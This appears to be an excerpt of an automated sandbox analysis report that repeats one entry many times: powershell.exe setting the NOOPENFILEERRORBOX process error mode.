                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
